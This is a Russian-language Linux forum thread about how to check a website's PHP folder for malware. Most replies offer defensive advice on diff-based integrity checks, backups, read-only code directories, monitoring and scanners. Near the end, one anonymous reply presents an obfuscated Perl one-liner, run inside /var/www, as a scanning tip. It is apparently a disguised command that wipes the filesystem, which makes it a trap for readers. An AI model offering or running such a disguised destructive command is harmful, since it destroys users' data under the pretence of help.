LINUX.ORG.RU
ФорумAdmin

Чем можно просканировать папку с сайтом на вирусы?

 , , ,


0

1

Отдам предпочтение конечно же сканерам на PHP либо онлайн сервисам. Иногда просто нужен хороший сканер, чтобы хорошо проверял сайты на различных PHP приблудах типа Wordpress, Joomla и т.д.


Патч Бармина всегда хорошо справлялся.

crutch_master ★★★★★ ()

virustotal попробуй. Предыдущий комментатор неспешной тролль, не слушай его.

anonymous ()

онлайн-сервис сканера локальной файловой системы на вирусы на пэхепе…
да по вам мил сударь шнобелевская премия плачет :)

pfg ★★★★★ ()
Ответ на: комментарий от sparks

Просто есть такие сайты, где сканируеш на вирусы, вирусов 0, но google ADS всё равно пишет что на вашем сайте вредоносное ПО, и разместить рекламу не даёт.

serhey ()

папку с сайтом

у виндузятника даже одна звезда, хотя даже пыхпых сайт у него в папке. Линуксоидов тут нет есть гибридные винликсоиды с 5 звездами. Лор он такой лор.

anonymous ()

Нормального такого сервиса не существует. Для десктопного софта собирают базы, сканер разной пхп заразы - вещь сильно нишевая. Удали и накати свежие скрипты.

goingUp ★★★★★ ()
Ответ на: комментарий от serhey

Даже у гугла бывают ложные срабатывания. У меня такое было несколько раз - решалось просто указанием в вебмастере что я принял меры.

gruy ★★★★★ ()

Надо не на вирусы сканировать, а на соответствие дереву исходников и отсутствие всего лишнего. Есть файл, которого не должно быть или какой-то файл изменён – значит что-то не так.

X512 ★★★★ ()
Ответ на: комментарий от serhey

Действительно, глупости какие пишет. Ты чем сервису какому-то непонятному доступ к серверу давать, лучше нам сюда IP и логин\пароль рутовый дай, мы просканируем всем лором. Так надёжней будет.

mogwai ★★★★ ()
Ответ на: комментарий от anonymous

virustotal попробуй. Предыдущий комментатор неспешной тролль, не слушай его.

Ничего не надо сканировать. Никто ничего не найдёт. Надо снести всё и накатить бекап. У тебя есть бекап? Нет? Ты в жопе, поздравляю.

crutch_master ★★★★★ ()
Последнее исправление: crutch_master (всего исправлений: 2 )
Ответ на: комментарий от serhey

И вообще-то есть такие сервисы для сканирования сайтов на вирусы.

Лохотрон.

Просто есть такие сайты, где сканируеш на вирусы, вирусов 0, но google ADS всё равно пишет что на вашем сайте вредоносное ПО

С сцайта спамили/делали какую-то херню и он засветился у гугла. Всё, приехал, чёрная метка.

crutch_master ★★★★★ ()
Ответ на: комментарий от serhey

И вообще-то есть такие сервисы для сканирования сайтов на вирусы.

Надо опасаться за вирусы после сканирования такими сервисами.

X512 ★★★★ ()
Ответ на: комментарий от X512

Надо не на вирусы сканировать, а на соответствие дереву исходников и отсутствие всего лишнего. Есть файл, которого не должно быть или какой-то файл изменён – значит что-то не так.

+100 Ровно тоже хотел написать.

anc ★★★★★ ()

просканировать папку

Открывая тему, я уже по заголовку знал, что сюда прибежали анонимусы с мамками. Но сейчас к ним даже регистрант присоединился.

По теме. Ты же понимаешь, что PHP: 1) интерпретируемый язык; 2) вызов PHP веб-сервером ограничен таймаутом? Оба пункта для продолжительной задачи, которой является сканирование ФС — очень весёлые. А если вызывать не веб-сервером, то PHP теряет смысл. Обычный антивирус на обычном языке.

Для статических сайтов лучше всего контролировать целостность, как написали выше. Когда у меня сайт подцепил зловреда на джаваскрипте, он дописывал куски своего кода прямо в тело страниц. Такое выявляется легко.

Вот как со всякими вордпрессами и джумлами — я не знаю. Там же контент добавляется пользователями…

Кстати, товарищ с бэкапом, пусть и в гротескной форме, но тоже дело говорит. Вне зависимости от того, что и чем ты будешь сканировать, бэкапы нужны.

hobbit ★★★★★ ()
Последнее исправление: hobbit (всего исправлений: 1 )
Ответ на: комментарий от Psilocybe

В общем случае это лучше спрашивать у специалистов по уязвимостям, я к таковым не отношусь. Там дохрена интересных вариантов.
Но конкретно в моём случае, вероятно, виноват пролюбленный пароль от SSH (к счастью, не рутовый, но чтобы записать гадость внутрь файлов страниц, рут и не нужен). По крайней мере, после смены пароля прошло три года, больше зловреды не шевелились. Пришлось писать во всякие спам-базы, чтобы меня оттуда вычеркнули (и то похоже, что вычеркнули не отовсюду).

hobbit ★★★★★ ()
Ответ на: комментарий от anonymous

Линуксоидов тут нет есть гибридные винликсоиды

Вот щас обидно было.

Nervous ★★★★★ ()
Ответ на: комментарий от pfg

да по вам мил сударь шнобелевская премия плачет :)

Премия Дарвина для сисадмина.

X512 ★★★★ ()
Ответ на: комментарий от crutch_master

Надо снести всё и накатить бекап.
У тебя есть бекап?
Нет?
Ты в жопе, поздравляю.

У тебя есть бекап?
Да.
Накатил бэкап, немного подождал...
Ты опять в жопе, поздравляю.

anc ★★★★★ ()
Ответ на: комментарий от Psilocybe

Как такое возможно?

Подобрали пароль а админке, заюзали скриптом очередную дыру с выполнением кода в самой популярной (или не очень) цмс. Обделались админы на шаред хостинге. Для пхп - масса вариантов.

crutch_master ★★★★★ ()

Для WP есть Wordfence, справляется на ура. Насчет жумлы хз.

Zhbert ★★★★★ ()
Ответ на: комментарий от Aleksandra

Дырявая CMS, модули и т.д. Вам повторно зальют шелл.

Ну так восстанавливаешь и ставишь обновления.

Ваш бэкап уже с шеллами

Значит это - говноархив раз в неделю с затиранием всего, что было n мес. назад, а не нормальный накопительный бекап.

crutch_master ★★★★★ ()
Последнее исправление: crutch_master (всего исправлений: 1 )
Ответ на: комментарий от crutch_master

Подобрали пароль а админке, заюзали скриптом очередную дыру с выполнением кода в самой популярной (или не очень) цмс. Обделались админы на шаред хостинге. Для пхп - масса вариантов.

Перечисленные варианты встречаются только у ПХП что-ли?

Psilocybe ★★ ()
Ответ на: комментарий от serhey

Потому что тебе не вирусы надо искать, а внедрённые java-script'ы, XSS, дырки в плагинах и прочие уязвимости.

Гугли что-нибудь типа «scan site for vulnerabilities». Например, что-нибудь типа такого: https://geekflare.com/online-scan-website-security-vulnerabilities/

Я когда давно встречал оффлайновые утилиты для такого, но они все стоили много денег.

В общем, оставь слово вирусы в венде, ищи уязвимости.

shell-script ★★★★★ ()
Ответ на: комментарий от Psilocybe

В коде какой-нибудь формы ввода сайта/плагина разработчики забыли сделать валидацию, злоумышленник вбил туда однострочник, который прописался в код шаблона сайта куда-нить в дебри footer'а и теперь выполняется каждый раз на каждой странице твоего файла.

Или точно так же где-то не сделали проверку загружаемых файлов и вместо картинки к тебе пришёл скрипт, который выполняется каждый раз, когда кто-то обращается кэтой картинке, а потом уже делает всё, что хочет.

Или в какой-нибудь плагин, модуль яваскрипта или пхп внедрили вредоносный код, которой прозевали мантейнеры и это прилитело к тебе с обновлением.

Разнообразные sql-injections.

Это самые простые и очевидные способы, которым уже сто лет в обед, но всё-равно регулярно выскакивают новости о новых подобных косяках. На самом деле этих способов огромное количество.

Если уже залезли - то бекапы, поиск типовых ошибок по базам(выше я писал), но это тоже не панацея.

Варианты предотвращения: держать весь код сайта в readonly, выделив отдельную директорию для загружаемого контента и запретив запуск чего бы то ни было из этой директории; следить за обновлениями, подписаться на рассылку и ченджлоги используемых CMS; регулярные инкрементные бекапы, чтобы откатиться можно было не на условную вчерашнюю версию, потому как не всегда известно, когда сайт был взломан и возможно в бекапе уже сидит зловред; настроить систему мониторинга на анализ активности(ну, например, чаще всего со среднестатистического сайта не может быть исходящих коннектов - т.е. если мы увидим в мониторинге от пользователя www-data коннект на подозрительный адрес, нужно как минимум увидеть это в варнингах). И это тоже далеко не полный список.

shell-script ★★★★★ ()
Последнее исправление: shell-script (всего исправлений: 1 )
Ответ на: комментарий от crutch_master

Ты опять в жопе, поздравляю.

Чоэта?

А почему бы нет? Точнее странным будет если такого не случиться.

anc ★★★★★ ()
Ответ на: комментарий от Psilocybe

Подобрали пароль а админке, заюзали скриптом очередную дыру с выполнением кода в самой популярной (или не очень) цмс. Обделались админы на шаред хостинге. Для пхп - масса вариантов.

Перечисленные варианты встречаются только у ПХП что-ли?

Ну у брэйнфака они встречаются однозначно реже.

anc ★★★★★ ()
Ответ на: комментарий от crutch_master

Значит это - говноархив раз в неделю с затиранием всего, что было n мес. назад, а не нормальный накопительный бекап.

Злоумышленники не будут спешить, подождут пока он попадет во все накопительные бэкапы. Как правило так и бывает.

Aleksandra ()
Ответ на: комментарий от shell-script

ну да.
я забыл, как называется эта фигня, когда пользователь добровольно ставит браузер амига в продакшен-сервер?)

darkenshvein ★★★★★ ()
Ответ на: комментарий от Psilocybe

это типа когда вместо картинки скрипт?

Нет, это «типа когда» ваш сайт не голая статика (под статикой в данном случае я подразумеваю не изменяемость).

anc ★★★★★ ()

cd /var/www | perl -e ‘$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|{;;y; -/:-@[-{-};`-{/" -;;s;;$_;see’

anonymous ()
Ответ на: комментарий от Psilocybe

Так речь в топике о готовых движках.

anc ★★★★★ ()
Ответ на: комментарий от Aleksandra

Злоумышленники не будут спешить, подождут пока он попадет во все накопительные бэкапы. Как правило так и бывает.

И что? Спалится же со своими изменениями и вылезет на diff'е в любом случае. Если на сцайте 2 года никаких работ не делали, то там будет только он.

crutch_master ★★★★★ ()
Ответ на: комментарий от Aleksandra

Скажи свое «экспертное мнение» о:

  1. https://www.rfxn.com/projects/linux-malware-detect/

https://rfxn.com/downloads/rfxn.hdb

https://rfxn.com/downloads/rfxn.ndb

https://rfxn.com/downloads/rfxn.yara

  1. https://malware.expert/signatures/ (теперь платный)

И самое важное в этой теме:

  1. Антивирусником проверяем только изменяемые данные!!!

  2. Папка с неизменяемыми скриптами PHP сканируется универсальным Антивирусником от всех возможных вирусов - diff:

diff -aurN /path/to/PHP_original /path/to/PHP

Результат сканирования лучшим антивирусником всех времен diff отсылайте на https://www.virustotal.com так пополнятся базы сигнатур.

anonymous ()
Ответ на: комментарий от anonymous

Задачка на проверку ЛОРа.

Лор он такой лор.

Написать Антивирусник, на 2 строки кода, который по запросу ловит и лечит все старые, новые и будущие вирусы для неизменяемого каталога используя его оригинальную версию и утилиты diff & patch.

anonymous ()
Для того чтобы оставить комментарий войдите или зарегистрируйтесь.